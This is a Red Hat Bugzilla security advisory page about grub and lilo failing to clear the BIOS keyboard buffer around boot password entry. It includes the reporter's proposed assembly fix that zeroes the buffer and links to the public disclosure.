Bug 457087 - grub/lilo: fails to sanitize keyboard buffer before and after reading password
Summary: grub/lilo: fails to sanitize keyboard buffer before and after reading password
Keywords:
Status: CLOSED WONTFIX
Alias: None
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2008-07-29 15:25 UTC by Tomas Hoger
Modified: 2019-09-29 12:25 UTC (History)
2 users (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed: 2010-03-22 15:42:35 UTC
Embargoed:


Attachments (Terms of Use)

Description Tomas Hoger 2008-07-29 15:25:31 UTC
Jonathan Brossard of the iViZ Techno Solutions reported, that commonly used
Linux bootloaders grub and lilo fails to sanitize keyboard buffer before and
after reading pre-boot passwords.

Based on the OS booted, this can allow privileged (Unix systems) or unprivileged
users (Windows systems, according to Jonathan's report) to extract boot password
from the system memory, or fill keyboard buffer with commands that will get
executed by boot loader on the system reboot.

Further details are planned to be disclosed on the Defcon conference:
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Brossard

Comment 1 Tomas Hoger 2008-07-29 15:28:09 UTC
Jonathan's proposed solution:

Implementing a chacking routine doing something like this, (this is real mode
16b asm, for nasm compiler) :

; zero 36b starting at address 0x40:0x1a
    xor ax,ax
    mov al, 0x40
    mov ds, ax
    mov al, 0x1a
    mov si, ax
    mov cx, 0x24

    xor al, al

cleanall:
    mov [ds:si], ax
    loop cleanall


and calling it _before_ and _after_ reading the password will fix both
vulnerabilities.

Comment 5 Tomas Hoger 2008-07-30 12:09:56 UTC
Opening bug, as all the information is public now via grub bug mailing list
public archives:

http://www.mail-archive.com/bug-grub@gnu.org/msg11628.html
http://www.mail-archive.com/bug-grub@gnu.org/msg11629.html


Note You need to log in before you can comment on or make changes to this bug.